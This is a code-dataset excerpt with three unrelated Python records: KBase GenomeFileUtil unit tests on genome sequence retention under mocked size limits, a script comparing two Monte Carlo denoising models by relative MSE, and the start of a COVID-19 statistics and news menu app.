gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
ws_obj_name = 'full_sequence'
result = self.getImpl().genbank_to_genome(
self.getContext(),
{
'file': {
'path': gbk_path},
'workspace_name': self.getWsName(),
'genome_name': ws_obj_name,
'generate_ids_if_needed': 1
})[0]
data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
token=self.__class__.token,
service_ver='dev')
genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
count_features_without_dna_sequence = 0
for feature in genome['features']:
if "dna_sequence" not in feature:
count_features_without_dna_sequence += 1
count_non_coding_features_without_sequence = 0
for feature in genome['non_coding_features']:
if "dna_sequence" not in feature:
if feature["dna_sequence_length"] <= 10000:
count_non_coding_features_without_sequence += 1
print("non_coding_feature_without_sequence: " + str(feature))
count_cdss_without_sequence = 0
for feature in genome['cdss']:
if "dna_sequence" not in feature:
count_cdss_without_sequence += 1
self.assertTrue(count_features_without_dna_sequence == 0,"All features should have DNA sequences.")
self.assertTrue(count_non_coding_features_without_sequence == 0,
"All non_coding_features should have DNA sequences.")
self.assertTrue(count_cdss_without_sequence == 0,"All CDSs should have DNA sequences.")
@mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 14000000)
def test_partial_sequence(self):
# features should not have sequences in it. But both non_coding_features and CDSs should have sequences.
print("test_partial_sequence")
gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
ws_obj_name = 'partial_sequence'
result = self.getImpl().genbank_to_genome(
self.getContext(),
{
'file': {
'path': gbk_path},
'workspace_name': self.getWsName(),
'genome_name': ws_obj_name,
'generate_ids_if_needed': 1
})[0]
data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
token=self.__class__.token,
service_ver='dev')
genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
count_features_with_dna_sequence = 0
for feature in genome['features']:
if "dna_sequence" in feature:
count_features_with_dna_sequence += 1
count_non_coding_features_without_sequence = 0
for feature in genome['non_coding_features']:
if "dna_sequence" not in feature:
if feature["dna_sequence_length"] <= 10000:
count_non_coding_features_without_sequence += 1
print("non_coding_feature_without_sequence: " + str(feature))
count_cdss_without_sequence = 0
for feature in genome['cdss']:
if "dna_sequence" not in feature:
count_cdss_without_sequence += 1
self.assertTrue(count_features_with_dna_sequence == 0,"All features should not have DNA sequences.")
self.assertTrue(count_non_coding_features_without_sequence == 0,
"All non_coding_features should have DNA sequences.")
self.assertTrue(count_cdss_without_sequence == 0,"All CDSs should have DNA sequences.")
@mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 9000000)
def test_no_sequence_kept(self):
# features, cds, and non_coding_features should not have sequences in it.
print("test_no_sequence_kept")
gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
ws_obj_name = 'no_sequence'
result = self.getImpl().genbank_to_genome(
self.getContext(),
{
'file': {
'path': gbk_path},
'workspace_name': self.getWsName(),
'genome_name': ws_obj_name,
'generate_ids_if_needed': 1
})[0]
data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
token=self.__class__.token,
service_ver='dev')
genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
count_features_with_dna_sequence = 0
for feature in genome['features']:
if "dna_sequence" in feature:
count_features_with_dna_sequence += 1
count_non_coding_features_with_sequence = 0
for feature in genome['non_coding_features']:
if "dna_sequence" in feature:
count_non_coding_features_with_sequence += 1
count_cdss_with_sequence = 0
for feature in genome['cdss']:
if "dna_sequence" in feature:
count_cdss_with_sequence += 1
self.assertTrue(count_features_with_dna_sequence == 0,"All features should not have DNA sequences.")
self.assertTrue(count_non_coding_features_with_sequence == 0,
"All non_coding_features should not have DNA sequences.")
self.assertTrue(count_cdss_with_sequence == 0,"All CDSs should not have DNA sequences.")
@mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 1)
def test_max_genome_size(self):
with self.assertRaisesRegex(ValueError, "This genome size of "):
GenomeInterface.validate_genome({"taxon_ref": "", "domain": ""})
|
<filename>test/utility/genome_size_tests.py
import os
import shutil
import time
import unittest
import mock
from configparser import ConfigParser
from installed_clients.DataFileUtilClient import DataFileUtil
from GenomeFileUtil.GenomeFileUtilImpl import GenomeFileUtil
from GenomeFileUtil.GenomeFileUtilServer import MethodContext
from GenomeFileUtil.core.GenomeInterface import GenomeInterface
from installed_clients.WorkspaceClient import Workspace as workspaceService
class GenomeFileUtilTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
token = os.environ.get('KB_AUTH_TOKEN', None)
# WARNING: don't call any logging methods on the context object,
# it'll result in a NoneType error
cls.ctx = MethodContext(None)
cls.ctx.update({'token': token,
'provenance': [
{'service': 'GenomeFileUtil',
'method': 'please_never_use_it_in_production',
'method_params': []
}],
'authenticated': 1})
config_file = os.environ.get('KB_DEPLOYMENT_CONFIG', None)
cls.cfg = {}
config = ConfigParser()
config.read(config_file)
for nameval in config.items('GenomeFileUtil'):
cls.cfg[nameval[0]] = nameval[1]
cls.wsURL = cls.cfg['workspace-url']
cls.wsClient = workspaceService(cls.wsURL, token=token)
cls.serviceImpl = GenomeFileUtil(cls.cfg)
cls.token = token
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'wsName'):
cls.wsClient.delete_workspace({'workspace': cls.wsName})
print('Test workspace was deleted')
def getWsClient(self):
return self.__class__.wsClient
def getWsName(self):
if hasattr(self.__class__, 'wsName'):
return self.__class__.wsName
suffix = int(time.time() * 1000)
wsName = "test_GenomeFileUtil_" + str(suffix)
self.getWsClient().create_workspace({'workspace': wsName})
self.__class__.wsName = wsName
return wsName
def getImpl(self):
return self.__class__.serviceImpl
def getContext(self):
return self.__class__.ctx
def test_full_sequence(self):
# features should not have sequences in it. But both non_coding_features and CDSs should have sequences.
print("test_full_sequence")
gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
ws_obj_name = 'full_sequence'
result = self.getImpl().genbank_to_genome(
self.getContext(),
{
'file': {
'path': gbk_path},
'workspace_name': self.getWsName(),
'genome_name': ws_obj_name,
'generate_ids_if_needed': 1
})[0]
data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
token=self.__class__.token,
service_ver='dev')
genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
count_features_without_dna_sequence = 0
for feature in genome['features']:
if "dna_sequence" not in feature:
count_features_without_dna_sequence += 1
count_non_coding_features_without_sequence = 0
for feature in genome['non_coding_features']:
if "dna_sequence" not in feature:
if feature["dna_sequence_length"] <= 10000:
count_non_coding_features_without_sequence += 1
print("non_coding_feature_without_sequence: " + str(feature))
count_cdss_without_sequence = 0
for feature in genome['cdss']:
if "dna_sequence" not in feature:
count_cdss_without_sequence += 1
self.assertTrue(count_features_without_dna_sequence == 0,"All features should have DNA sequences.")
self.assertTrue(count_non_coding_features_without_sequence == 0,
"All non_coding_features should have DNA sequences.")
self.assertTrue(count_cdss_without_sequence == 0,"All CDSs should have DNA sequences.")
@mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 14000000)
def test_partial_sequence(self):
# features should not have sequences in it. But both non_coding_features and CDSs should have sequences.
print("test_partial_sequence")
gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
ws_obj_name = 'partial_sequence'
result = self.getImpl().genbank_to_genome(
self.getContext(),
{
'file': {
'path': gbk_path},
'workspace_name': self.getWsName(),
'genome_name': ws_obj_name,
'generate_ids_if_needed': 1
})[0]
data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
token=self.__class__.token,
service_ver='dev')
genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
count_features_with_dna_sequence = 0
for feature in genome['features']:
if "dna_sequence" in feature:
count_features_with_dna_sequence += 1
count_non_coding_features_without_sequence = 0
for feature in genome['non_coding_features']:
if "dna_sequence" not in feature:
if feature["dna_sequence_length"] <= 10000:
count_non_coding_features_without_sequence += 1
print("non_coding_feature_without_sequence: " + str(feature))
count_cdss_without_sequence = 0
for feature in genome['cdss']:
if "dna_sequence" not in feature:
count_cdss_without_sequence += 1
self.assertTrue(count_features_with_dna_sequence == 0,"All features should not have DNA sequences.")
self.assertTrue(count_non_coding_features_without_sequence == 0,
"All non_coding_features should have DNA sequences.")
self.assertTrue(count_cdss_without_sequence == 0,"All CDSs should have DNA sequences.")
@mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 9000000)
def test_no_sequence_kept(self):
# features, cds, and non_coding_features should not have sequences in it.
print("test_no_sequence_kept")
gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
ws_obj_name = 'no_sequence'
result = self.getImpl().genbank_to_genome(
self.getContext(),
{
'file': {
'path': gbk_path},
'workspace_name': self.getWsName(),
'genome_name': ws_obj_name,
'generate_ids_if_needed': 1
})[0]
data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
token=self.__class__.token,
service_ver='dev')
genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
count_features_with_dna_sequence = 0
for feature in genome['features']:
if "dna_sequence" in feature:
count_features_with_dna_sequence += 1
count_non_coding_features_with_sequence = 0
for feature in genome['non_coding_features']:
if "dna_sequence" in feature:
count_non_coding_features_with_sequence += 1
count_cdss_with_sequence = 0
for feature in genome['cdss']:
if "dna_sequence" in feature:
count_cdss_with_sequence += 1
self.assertTrue(count_features_with_dna_sequence == 0,"All features should not have DNA sequences.")
self.assertTrue(count_non_coding_features_with_sequence == 0,
"All non_coding_features should not have DNA sequences.")
self.assertTrue(count_cdss_with_sequence == 0,"All CDSs should not have DNA sequences.")
@mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 1)
def test_max_genome_size(self):
with self.assertRaisesRegex(ValueError, "This genome size of "):
GenomeInterface.validate_genome({"taxon_ref": "", "domain": ""})
|
en
| 0.970041
|
# WARNING: don't call any logging methods on the context object, # it'll result in a NoneType error # features should not have sequences in it. But both non_coding_features and CDSs should have sequences. # features should not have sequences in it. But both non_coding_features and CDSs should have sequences. # features, cds, and non_coding_features should not have sequences in it.
| 2.099079
| 2
|
scripts/compare_models.py
|
milebril/Temporal-SBMC-extension
| 0
|
6627636
|
<reponame>milebril/Temporal-SBMC-extension
import numpy as np
import torch as th
import cv2
import argparse
import tempfile
from torch.utils.data import DataLoader
import os
import pyexr
import cv2
import skimage.io as skio
from ttools.modules.image_operators import crop_like
import matplotlib.pyplot as plt
from collections import defaultdict
from sbmc import losses
from sbmc import modules
import ttools
import sbmc
LOG = ttools.get_logger(__name__)
ttools.get_logger('matplotlib.font_manager').disabled = True
#'ksize': 21, 'gather': False, 'pixel': False
def main(args):
if not os.path.exists(args.data):
raise ValueError("input {} does not exist".format(args.data))
# Load the data
data_params = dict(spp=args.spp)
data = sbmc.FullImagesDataset(args.data, **data_params)
dataloader = DataLoader(data, batch_size=1, shuffle=False, num_workers=0)
# Load the two models
temp = th.load(f"{args.model1}", map_location=th.device('cpu'))
model_one = sbmc.RecurrentMultisteps(data.num_features, data.num_global_features)
try: # Depending on the way a model is saved, the statedict is referenced with different keys
model_one.load_state_dict(temp['model'])
except:
model_one.load_state_dict(temp['model_state_dict'])
model_one.train(False)
temp = th.load(f"{args.model2}", map_location=th.device('cpu'))
model_two = sbmc.Multisteps(data.num_features, data.num_global_features)
try: # Depending on the way a model is saved, the statedict is referenced with different keys
model_two.load_state_dict(temp['model'])
except:
model_two.load_state_dict(temp['model_state_dict'])
model_two.train(False)
device = "cuda" if th.cuda.is_available() else "cpu"
if (device == "cuda"):
LOG.info("Using CUDA")
model_one.cuda()
model_two.cuda()
rmse_checker = losses.RelativeMSE()
rmse_checker.to(device)
# start = np.random.randint(0, 80) * 5
start = 0
model_one_outputs = []
model_two_outputs = []
ground_thruths = []
for batch_idx, batch in enumerate(dataloader):
if batch_idx < start:
continue
if batch_idx >= start + args.amount:
break
for k in batch.keys():
if not batch[k].__class__ == th.Tensor:
continue
batch[k] = batch[k].to(device) # Sets the tensors to the correct device type
# Compute the radiances using the two models
with th.no_grad():
output1 = model_one(batch)["radiance"]
output2 = model_two(batch)["radiance"]
model_one_outputs.append(output1)
model_two_outputs.append(output2)
# Get the input image and ground thruth for comparison
tgt = crop_like(batch["target_image"], output1)
ground_thruths.append(tgt)
low_spp = crop_like(batch["low_spp"], output1)
# Compare to ground thruth
with th.no_grad():
rmse1 = rmse_checker(output1, tgt)
rmse2 = rmse_checker(output2, tgt)
LOG.info(f"Model 1 denoised with rmse: {rmse1} || Model 2 denoised with rmse: {rmse2}")
if rmse2 < rmse1:
LOG.info("Model 2 outperformed model 1")
else:
LOG.info("Model 1 outperformed model 2")
save_img(output1, output2, low_spp, tgt, args.save_dir, str(batch_idx))
#Display Denoising quality
data_to_show = [model_one_outputs, model_two_outputs, ground_thruths]
fig, axeslist = plt.subplots(ncols=len(model_one_outputs), nrows=len(data_to_show))
plot_data = []
for i, data in enumerate(data_to_show):
for idx, img in enumerate(data):
rmse = rmse_checker(img, ground_thruths[idx]).item()
res = process_radiance(img)
plot_data.append({'img': res, 'rmse': rmse})
# Create image matrix
for ind, data in enumerate(plot_data):
axeslist.ravel()[ind].imshow(data['img'])
axeslist.ravel()[ind].set_title(str(round(data['rmse'], 5)))
axeslist.ravel()[ind].set_axis_off()
plt.tight_layout() # optional
plt.show()
# Show differences
diff_array = []
fig, axeslist = plt.subplots(ncols=len(model_one_outputs), nrows=3)
rmse_data = defaultdict(list)
data_to_show = [model_one_outputs, model_two_outputs, ground_thruths]
for i, data in enumerate(data_to_show):
for idx, img in enumerate(data):
if idx > 0:
diff = (img - data[idx-1]).abs()
rmse = rmse_checker(img, data[idx-1]).item()
rmse_data[str(i)].append(rmse)
else:
diff = th.zeros_like(tgt)
rmse = 0
res = process_radiance(diff)
diff_array.append({'img': res, 'rmse': rmse})
# Create image matrix
for ind, data in enumerate(diff_array):
axeslist.ravel()[ind].imshow(data['img'])
axeslist.ravel()[ind].set_title(str(round(data['rmse'], 5)))
axeslist.ravel()[ind].set_axis_off()
plt.tight_layout() # optional
plt.show()
# save_compare_frame(output1, output2, tgt)
# make_compare_video(args.save_dir)
def process_radiance(data):
data = th.clamp(data, 0)
data /= 1 + data
data = th.pow(data, 1.0/2.2)
data = th.clamp(data, 0, 1)
data = data[0, ...].cpu().detach().numpy().transpose([1, 2, 0])
data = np.ascontiguousarray(data)
return data
frames = []
def save_compare_frame(radiance1, radiance2, tgt):
# Difference between models and ground thruth
diff_model1 = (radiance1 - tgt).abs()
diff_model2 = (radiance2 - tgt).abs()
first_row = th.cat([radiance1, diff_model1], -1)
second_row = th.cat([radiance2, diff_model2], -1)
data = th.cat([first_row, second_row], -2)
data = th.clamp(data, 0)
data /= 1 + data
data = th.pow(data, 1.0/2.2)
data = th.clamp(data, 0, 1)
data = data[0, ...].cpu().detach().numpy().transpose([1, 2, 0])
# Clip to 0-255 to remove HDR and pure radiance estimates + change to BGR color spectrum for opencv
frames.append(cv2.cvtColor((np.clip(data, 0, 1)*255).astype(np.uint8), cv2.COLOR_RGB2BGR))
def make_compare_video(location):
height, width, layers = frames[0].shape
# Write to video
out = cv2.VideoWriter(f'{location}/compare_video.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 5, (width, height))
# Stitch 5 times to create loop
for _ in range(10):
for i in range(len(frames)):
out.write(frames[i])
frames.reverse()
out.release()
def save_img(radiance1, radiance2, low_radiance, tgt, checkpoint_dir, name):
tmp_empty = th.zeros_like(radiance1) # Empty filler tensor
# Difference between models and ground thruth
diff_model1 = (radiance1 - tgt).abs()
diff_model2 = (radiance2 - tgt).abs()
# Create output data in the form:
# low spp input --
# ouput model1 -- Diff with tgt
# ouput model2 -- Diff with tgt
# tgt --
first_row = th.cat([tmp_empty, low_radiance, tmp_empty], -1)
second_row = th.cat([tmp_empty, radiance1, diff_model1], -1)
third_row = th.cat([tmp_empty, radiance2, diff_model2], -1)
fourth_row = th.cat([tmp_empty, tgt, tmp_empty], -1)
# Concate the data in a vertical stack
data = th.cat([first_row, second_row, third_row, fourth_row], -2)
data = th.clamp(data, 0)
data /= 1 + data
data = th.pow(data, 1.0/2.2)
data = th.clamp(data, 0, 1)
data = data[0, ...].cpu().detach().numpy().transpose([1, 2, 0])
data = np.ascontiguousarray(data)
# Add text to the images
jump = radiance1.size()[2]
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(data, '4spp', (10, jump * 0 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
cv2.putText(data, 'Model 1', (10, jump * 1 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
cv2.putText(data, 'Model 2', (10, jump * 2 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
cv2.putText(data, 'Target', (10, jump * 3 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
os.makedirs(checkpoint_dir, exist_ok=True)
outputfile = os.path.join(checkpoint_dir, f'{name}.png')
pyexr.write(outputfile, data)
png = outputfile.replace(".exr", ".png")
skio.imsave(png, (np.clip(data, 0, 1)*255).astype(np.uint8))
def load_model(model, load_path):
checkpoint = th.load(load_path)
model.load_state_dict(checkpoint['model_state_dict'])
epoch = checkpoint['epoch']
return model, epoch
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
'--model1', required=True, help="path to the first model")
parser.add_argument(
'--model2', required=True, help="path to the second model")
parser.add_argument(
'--save_dir', required=True, help="path to the dir where everything has to be saved")
parser.add_argument(
'--data', required=True, help="path to the training data.")
parser.add_argument(
'--amount', required=False, type=int,default=1, help="Amount of frames to denoise and compare")
parser.add_argument('--spp', type=int,
help="number of samples to use as input.")
args = parser.parse_args()
ttools.set_logger(True)
main(args)
|
import numpy as np
import torch as th
import cv2
import argparse
import tempfile
from torch.utils.data import DataLoader
import os
import pyexr
import cv2
import skimage.io as skio
from ttools.modules.image_operators import crop_like
import matplotlib.pyplot as plt
from collections import defaultdict
from sbmc import losses
from sbmc import modules
import ttools
import sbmc
LOG = ttools.get_logger(__name__)
ttools.get_logger('matplotlib.font_manager').disabled = True
#'ksize': 21, 'gather': False, 'pixel': False
def main(args):
if not os.path.exists(args.data):
raise ValueError("input {} does not exist".format(args.data))
# Load the data
data_params = dict(spp=args.spp)
data = sbmc.FullImagesDataset(args.data, **data_params)
dataloader = DataLoader(data, batch_size=1, shuffle=False, num_workers=0)
# Load the two models
temp = th.load(f"{args.model1}", map_location=th.device('cpu'))
model_one = sbmc.RecurrentMultisteps(data.num_features, data.num_global_features)
try: # Depending on the way a model is saved, the statedict is referenced with different keys
model_one.load_state_dict(temp['model'])
except:
model_one.load_state_dict(temp['model_state_dict'])
model_one.train(False)
temp = th.load(f"{args.model2}", map_location=th.device('cpu'))
model_two = sbmc.Multisteps(data.num_features, data.num_global_features)
try: # Depending on the way a model is saved, the statedict is referenced with different keys
model_two.load_state_dict(temp['model'])
except:
model_two.load_state_dict(temp['model_state_dict'])
model_two.train(False)
device = "cuda" if th.cuda.is_available() else "cpu"
if (device == "cuda"):
LOG.info("Using CUDA")
model_one.cuda()
model_two.cuda()
rmse_checker = losses.RelativeMSE()
rmse_checker.to(device)
# start = np.random.randint(0, 80) * 5
start = 0
model_one_outputs = []
model_two_outputs = []
ground_thruths = []
for batch_idx, batch in enumerate(dataloader):
if batch_idx < start:
continue
if batch_idx >= start + args.amount:
break
for k in batch.keys():
if not batch[k].__class__ == th.Tensor:
continue
batch[k] = batch[k].to(device) # Sets the tensors to the correct device type
# Compute the radiances using the two models
with th.no_grad():
output1 = model_one(batch)["radiance"]
output2 = model_two(batch)["radiance"]
model_one_outputs.append(output1)
model_two_outputs.append(output2)
# Get the input image and ground thruth for comparison
tgt = crop_like(batch["target_image"], output1)
ground_thruths.append(tgt)
low_spp = crop_like(batch["low_spp"], output1)
# Compare to ground thruth
with th.no_grad():
rmse1 = rmse_checker(output1, tgt)
rmse2 = rmse_checker(output2, tgt)
LOG.info(f"Model 1 denoised with rmse: {rmse1} || Model 2 denoised with rmse: {rmse2}")
if rmse2 < rmse1:
LOG.info("Model 2 outperformed model 1")
else:
LOG.info("Model 1 outperformed model 2")
save_img(output1, output2, low_spp, tgt, args.save_dir, str(batch_idx))
#Display Denoising quality
data_to_show = [model_one_outputs, model_two_outputs, ground_thruths]
fig, axeslist = plt.subplots(ncols=len(model_one_outputs), nrows=len(data_to_show))
plot_data = []
for i, data in enumerate(data_to_show):
for idx, img in enumerate(data):
rmse = rmse_checker(img, ground_thruths[idx]).item()
res = process_radiance(img)
plot_data.append({'img': res, 'rmse': rmse})
# Create image matrix
for ind, data in enumerate(plot_data):
axeslist.ravel()[ind].imshow(data['img'])
axeslist.ravel()[ind].set_title(str(round(data['rmse'], 5)))
axeslist.ravel()[ind].set_axis_off()
plt.tight_layout() # optional
plt.show()
# Show differences
diff_array = []
fig, axeslist = plt.subplots(ncols=len(model_one_outputs), nrows=3)
rmse_data = defaultdict(list)
data_to_show = [model_one_outputs, model_two_outputs, ground_thruths]
for i, data in enumerate(data_to_show):
for idx, img in enumerate(data):
if idx > 0:
diff = (img - data[idx-1]).abs()
rmse = rmse_checker(img, data[idx-1]).item()
rmse_data[str(i)].append(rmse)
else:
diff = th.zeros_like(tgt)
rmse = 0
res = process_radiance(diff)
diff_array.append({'img': res, 'rmse': rmse})
# Create image matrix
for ind, data in enumerate(diff_array):
axeslist.ravel()[ind].imshow(data['img'])
axeslist.ravel()[ind].set_title(str(round(data['rmse'], 5)))
axeslist.ravel()[ind].set_axis_off()
plt.tight_layout() # optional
plt.show()
# save_compare_frame(output1, output2, tgt)
# make_compare_video(args.save_dir)
def process_radiance(data):
data = th.clamp(data, 0)
data /= 1 + data
data = th.pow(data, 1.0/2.2)
data = th.clamp(data, 0, 1)
data = data[0, ...].cpu().detach().numpy().transpose([1, 2, 0])
data = np.ascontiguousarray(data)
return data
frames = []
def save_compare_frame(radiance1, radiance2, tgt):
# Difference between models and ground thruth
diff_model1 = (radiance1 - tgt).abs()
diff_model2 = (radiance2 - tgt).abs()
first_row = th.cat([radiance1, diff_model1], -1)
second_row = th.cat([radiance2, diff_model2], -1)
data = th.cat([first_row, second_row], -2)
data = th.clamp(data, 0)
data /= 1 + data
data = th.pow(data, 1.0/2.2)
data = th.clamp(data, 0, 1)
data = data[0, ...].cpu().detach().numpy().transpose([1, 2, 0])
# Clip to 0-255 to remove HDR and pure radiance estimates + change to BGR color spectrum for opencv
frames.append(cv2.cvtColor((np.clip(data, 0, 1)*255).astype(np.uint8), cv2.COLOR_RGB2BGR))
def make_compare_video(location):
height, width, layers = frames[0].shape
# Write to video
out = cv2.VideoWriter(f'{location}/compare_video.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 5, (width, height))
# Stitch 5 times to create loop
for _ in range(10):
for i in range(len(frames)):
out.write(frames[i])
frames.reverse()
out.release()
def save_img(radiance1, radiance2, low_radiance, tgt, checkpoint_dir, name):
tmp_empty = th.zeros_like(radiance1) # Empty filler tensor
# Difference between models and ground thruth
diff_model1 = (radiance1 - tgt).abs()
diff_model2 = (radiance2 - tgt).abs()
# Create output data in the form:
# low spp input --
# ouput model1 -- Diff with tgt
# ouput model2 -- Diff with tgt
# tgt --
first_row = th.cat([tmp_empty, low_radiance, tmp_empty], -1)
second_row = th.cat([tmp_empty, radiance1, diff_model1], -1)
third_row = th.cat([tmp_empty, radiance2, diff_model2], -1)
fourth_row = th.cat([tmp_empty, tgt, tmp_empty], -1)
# Concate the data in a vertical stack
data = th.cat([first_row, second_row, third_row, fourth_row], -2)
data = th.clamp(data, 0)
data /= 1 + data
data = th.pow(data, 1.0/2.2)
data = th.clamp(data, 0, 1)
data = data[0, ...].cpu().detach().numpy().transpose([1, 2, 0])
data = np.ascontiguousarray(data)
# Add text to the images
jump = radiance1.size()[2]
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(data, '4spp', (10, jump * 0 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
cv2.putText(data, 'Model 1', (10, jump * 1 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
cv2.putText(data, 'Model 2', (10, jump * 2 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
cv2.putText(data, 'Target', (10, jump * 3 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
os.makedirs(checkpoint_dir, exist_ok=True)
outputfile = os.path.join(checkpoint_dir, f'{name}.png')
pyexr.write(outputfile, data)
png = outputfile.replace(".exr", ".png")
skio.imsave(png, (np.clip(data, 0, 1)*255).astype(np.uint8))
def load_model(model, load_path):
checkpoint = th.load(load_path)
model.load_state_dict(checkpoint['model_state_dict'])
epoch = checkpoint['epoch']
return model, epoch
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
'--model1', required=True, help="path to the first model")
parser.add_argument(
'--model2', required=True, help="path to the second model")
parser.add_argument(
'--save_dir', required=True, help="path to the dir where everything has to be saved")
parser.add_argument(
'--data', required=True, help="path to the training data.")
parser.add_argument(
'--amount', required=False, type=int,default=1, help="Amount of frames to denoise and compare")
parser.add_argument('--spp', type=int,
help="number of samples to use as input.")
args = parser.parse_args()
ttools.set_logger(True)
main(args)
|
en
| 0.746113
|
#'ksize': 21, 'gather': False, 'pixel': False # Load the data # Load the two models # Depending on the way a model is saved, the statedict is referenced with different keys # Depending on the way a model is saved, the statedict is referenced with different keys # start = np.random.randint(0, 80) * 5 # Sets the tensors to the correct device type # Compute the radiances using the two models # Get the input image and ground thruth for comparison # Compare to ground thruth #Display Denoising quality # Create image matrix # optional # Show differences # Create image matrix # optional # save_compare_frame(output1, output2, tgt) # make_compare_video(args.save_dir) # Difference between models and ground thruth # Clip to 0-255 to remove HDR and pure radiance estimates + change to BGR color spectrum for opencv # Write to video # Stitch 5 times to create loop # Empty filler tensor # Difference between models and ground thruth # Create output data in the form: # low spp input -- # ouput model1 -- Diff with tgt # ouput model2 -- Diff with tgt # tgt -- # Concate the data in a vertical stack # Add text to the images
| 1.971375
| 2
|
app.py
|
arjundha/COMP1510-Hackathon
| 0
|
6627637
|
"""
Main application file
"""
import market_data
import covid19_stats
import news
import user_generation
import funding
import dow_plot
import doctest
def option_menu() -> int:
"""
Ask user to choose option.
:precondition: input must be a number that corresponds with an option
:postcondition: will return the user's choice as an int
:return: input as an int
"""
while True:
print("Please select an option from the following menu.")
try:
return int(input("""
1. Global Statistics
2. Information about my Country
3. Search by Country
4. News Articles
5. Search Stocks
6. Am I Eligible for the Canadian Emergency Response Benefit Funding?
7. Show effect of COVID-19 on DOW Jones Index
8. Quit
\n""").strip())
except ValueError:
print("Please input a number that corresponds to an option on the menu.")
def menu_handler(user_input: int, user: object or str) -> object:
"""
Return function that corresponds you user_input.
:param user_input: a user entered integer
:param user: a well formed user object
:precondition: user_input must be an integer that corresponds with an option
:precondition: user must be an object created in user_generation
:postcondition: will return the function that corresponds with desired option
:raise: TypeError if user_input does not correspond with and option
:return: a function that corresponds with user_input
"""
# Return the corresponding function
if user_input == 1:
return global_statistics()
if user_input == 2:
return my_country(user)
if user_input == 3:
return country_search()
if user_input == 4:
return get_news()
if user_input == 5:
search_stocks()
if user_input == 6:
return verify_canadian_funding(user)
if user_input == 7:
show_dow_chart()
if user_input == 8:
print("Have a nice day, and remember to wash your hands!")
quit()
else:
raise TypeError
def search_stocks():
"""
Ask user for stock
:postcondition: will run ask_for_stock() and ask user for a stock and then display the information
"""
market_data.ask_for_stock()
def show_dow_chart():
"""
Display DOW JONES chart.
:postcondition: will run the main function in dow_plot file
"""
dow_plot.main()
def verify_canadian_funding(user: object):
"""
Verify if user is eligible for Canadian Emergency Response Benefit funding.
:param user: User object
:precondition: user_object must be a well-formed User object
:postcondition: Successfully verify if user is eligible for Canadian Emergency Response Benefit funding
"""
funding.verify_for_funding(user)
def my_country(user: object or str):
"""
Display statistics from user country.
:param user: a well formed user object
:precondition: user must be an object created in user_generation
:postcondition: will display all information regarding the user's inputted location
"""
# Display country
print(user.get_country())
# Get Country stats by passing it to get_country_stats
country_stats = covid19_stats.get_country_stats(user.get_country())
display_statistics(country_stats)
def get_news():
"""
Display news article interface
:postcondition: will run the news article function get_default_country_top_headlines() from news
"""
news.display_news_articles_menu()
def country_search():
"""
Search country specific statistics.
:precondition: country input must be a valid country
:postcondition: will display the information regarding the entered country
:except: StopIteration if input is not a valid country
"""
# Ask user for input
country = input("Please input country\n").strip()
# Check if input meets conditions
try:
country_statistics = covid19_stats.get_country_stats(country)
except StopIteration:
print("Sorry, Your input is not a valid country\n")
print("Try typing the full name of the country. Ex: United States -> United States of America")
else:
# Display information
print(country.capitalize())
display_statistics(country_statistics)
def global_statistics():
"""
Display the global COVID-19 statistics.
:postcondition: will display all statistics for the world
"""
# Get the dictionary from from the api
global_dict = covid19_stats.global_stats()
# Specify the key
statistics = global_dict['Global']
# Display the information
display_statistics(statistics)
def display_statistics(statistics: dict or str):
"""
Display statistics from given dictionary.
:param statistics: covid19 dictionary
:preconditions: statistics must be a well formatted covid19 API dictionary
:postconditions: Will display details statistics regarding the specified dictionary
"""
print(f"""
Total Active Cases: {statistics["TotalConfirmed"] - statistics["TotalDeaths"] - statistics["TotalRecovered"]}
New Confirmed Cases: {statistics["NewConfirmed"]}
Total Confirmed: {statistics["TotalConfirmed"]}
New Deaths: {statistics["NewDeaths"]}
Total Deaths: {statistics["TotalDeaths"]}
Newly Recovered: {statistics["NewRecovered"]}
Total Recovered: {statistics["TotalRecovered"]}
\n""")
input("Hit enter to continue")
def main():
"""
